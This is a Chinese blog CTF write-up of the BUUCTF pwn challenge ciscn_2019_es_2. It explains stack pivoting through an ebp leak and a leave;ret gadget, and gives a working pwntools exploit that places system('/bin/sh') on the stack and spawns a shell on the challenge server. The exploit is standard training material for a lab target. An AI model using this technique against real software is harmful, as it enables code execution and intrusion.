pwn刷题num43---栈迁移

已于 2022-05-03 16:31:19 修改
阅读量649 收藏 6
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: linux 网络安全 c语言 安全 python
于 2022-05-03 10:32:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124545840
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-ciscn_2019_es_2

在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

32位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida一下看一下伪代码
在这里插入图片描述
在这里插入图片描述
可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序有system函数,也无法写入参数,所以要换个思路

思路—栈迁移

既然栈不够大,那就将函数返回地址覆盖为别的地方的地址。让程序从栈底跳到别处继续执行。这里需要用到一个gadget段leave_ret;

leave相当于		mov esp,ebp;
				pop ebp;
ret相当于		pop eip;

程序中有两个一样的read函数,
我们可以用第一次溢出泄露ebp地址,第二次利用泄露的ebp地址访问栈上所有地址,从而实现栈迁移,将system函数地址及参数/bin/sh插入栈中,调用system函数,获得shell
CTF-Wiki栈迁移
首先想办法泄露ebp地址,发现read函数之后有个printf函数,会把输入的字符串打印出来,但是%s遇到
‘\0’才结束打印,我们可以把栈填满(填0x28字节)把’\0’覆盖掉,接着把0x28字节之后的ebp也打印出来,获得ebp地址。我们要实现栈迁移,可以先找到栈的起始地址,将栈迁移到起始地址处
在第二个read函数那下断点(0x080485e0)在这里插入图片描述 在这里插入图片描述

在这里插入图片描述
输入ni单步执行,进入read函数,输入多个a,以0x61做标志
在这里插入图片描述
查看栈,

00:0000│ esp 0xffffcf10 ◂— 0x0
01:0004│     0xffffcf14 —▸ 0xffffcf20 ◂— 'aaaaaaaaaaaa\n'
02:0008│     0xffffcf18 ◂— 0x30 /* '0' */
03:000c│     0xffffcf1c ◂— 0x25 /* '%' */
04:0010│ ecx 0xffffcf20 ◂— 'aaaaaaaaaaaa\n'
... ↓        2 skipped
07:001c│     0xffffcf2c ◂— 0xa /* '\n' */
08:0020│     0xffffcf30 ◂— 0x0
... ↓        3 skipped
0c:0030│     0xffffcf40 —▸ 0x80486d8 ◂— push   edi /* "Welcome, my friend. What's your name?" */
0d:0034│     0xffffcf44 —▸ 0xffffd004 —▸ 0xffffd1d4 ◂— '/home/binary/CTF/pwnti/ciscn_2019_es_2'
0e:0038│ ebp 0xffffcf48 —▸ 0xffffcf58 ◂— 0x0
0f:003c│     0xffffcf4c —▸ 0x804862a (main+43) ◂— mov    eax, 0


01:0004│     0xffffcf14 —▸ 0xffffcf20 ◂— 'aaaaaaaaaaaa\n'
..........
..........
..........
0e:0038│ ebp 0xffffcf48 —▸ 0xffffcf58 ◂— 0x0

esp距离ebp0x38(0xffffcf58-0xffffcf20)字节
ebp-0x38即为栈的起始地址

然后寻找leave_ret段以及system函数地址
在这里插入图片描述
在这里插入图片描述

exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('node4.buuoj.cn',26131)
 
payload = flat(['a' * 0x28]) #覆盖末尾'\0',打印出ebp地址
sh.sendafter('your name?',payload)
sh.recvuntil('a' * 0x28)   
ebp_addr = u32(sh.recv(4)) #接收ebp地址,因为是32位程序,所以只需要接收4字节
print(hex(ebp_addr))

leave_ret = 0x080484b8
system_addr = 0x8048400
payload = b'a' * 4        #前面四字节为leave中的pop ebp,即‘aaaa’为ebp的值
payload+= p32(system_addr) # ret ,即p32(system_addr) 为eip的值,函数开始执行system函数
payload+= b'a' * 4  #system函数返回地址
payload+= p32(ebp_addr - 0x28) #写入栈中的字符串/bin/sh地址,当做参数传入system函数
payload+= b'/bin/sh'  #写入栈中的字符串/bin/sh
payload = (payload).ljust(0x28, b'\x00') #用0补满字符串s的0x28字节 
payload+= p32(ebp_addr - 0x38) #为leave中的pop ebp,即p32(ebp_addr - 0x38)为ebp的值
payload+= p32(leave_ret) #覆盖函数返回地址为leave_ret进行栈迁移
                         #	leave相当于	mov esp,ebp;
                         #			   pop ebp;
                         #	ret相当于	pop eip;

sh.sendline(payload)
sh.interactive()

运行获得flag在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-PWN-溢出pwn43)
Welcome To Myon'Blog !
04-24 1204
这是 gets() 函数的地址,我们将覆盖函数返回地址为 gets() 函数的地址,这样在程序返回时会跳转到 gets() 函数执行,我们就可以利用 gets() 函数从输入中获取数据。:这是 system() 函数的地址,我们将覆盖 gets() 函数的返回地址为 system() 函数的地址,这样在 gets() 函数执行完毕后,程序会继续执行 system() 函数。:这部分是填充数据,长度为 offset,目的是为了覆盖函数的返回地址,并确保我们能够控制程序的执行流程。
迁移基础
Civit_的博客
03-27 169
迁移就是控制E/RBP、E/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现程序执行流的目的。​ 溢出攻击时,一个条件就是栈上有充分的空间可以布局。当溢出空间不够时,就需要迁移来解决了。
PWN题型之迁移
swedsn
07-30 1459
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
[Black Watch 入群题]PWN-迁移
个人笔记
04-20 358
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
PWN · 迁移】[BUUCTF][Black Watch 入群题]PWN
Mr_Fmnwon的博客
08-01 370
进能够覆盖ebp和ret,很难不往迁移上想。 修改ebp和ret后我们可以将指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 656
pwn 64位 泄露libc版本
PWN——格式化字符串泄露canary
djhtdjdywgjc的博客
11-19 1225
格式化字符串泄露canary
从一道简单pwn题 认识 转移
qq_41071646的博客
04-27 496
这个题 好像是 bugku的 但是好像这个题 给换了 这个是 64位的程序 这个题 难搞点就是 空间不够 可以看的出来 我们s的地方是 rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 如果我们想把这个搞定 那么 要考虑一下 转移 转移 有很多高级的用法 这里 就浅显的说一些简单转移 转移 其实就是利用的是这两个...
溢出-pwn
weixin_44642009的博客
03-11 522
打开命名为pwn的可执行文件,将其用IDA静态调试器打开 简易进行相关汇编代码的分析,基本了解的结构 按F5对汇编代码进行反汇编,得到源代码 对setvbuf代码进行简单学习,也算是增长新知识,如下: 功 能: 把缓冲区与流相关; 用 法: int setvbuf(FILE *stream, char *buf, int type, unsigned size); 参数:stream:指向流...
【汇编】esp寻址与ebp寻址
qq_52572621的博客
09-08 1769
esp寻址的优缺点: 优点:便捷 缺点:当遇到复杂的、函数中对堆有操作的,esp寻址就会变得有些困难。 例如: 我们之前的测试两数相加,都是把参数从堆中取出,放在寄存器里,但实际开发中,寄存器里的值一般情况下都是有用的,说到底就是我们不能直接取出寄存器里的值,我们需要将值备份一份,然后再寻址,使用完成之后再将原来的值取出,如下:
[Black Watch 入群题]PWN迁移
wuyvle的博客
02-22 201
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后迁移到该地址执行,后面就是常规的泄露libc来getshell 迁移来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后.
【SCTF&&CCTF 2016】 PWN_WRITEUP
wintersun的地带
05-15 3692
这里是摘要吗
Pwn】BUUCTF ciscn_2019_s_4 wp 迁移
Lcw_linyx的博客
05-20 499
个人日记= =,记录pwn自己的自闭过程
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1006
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值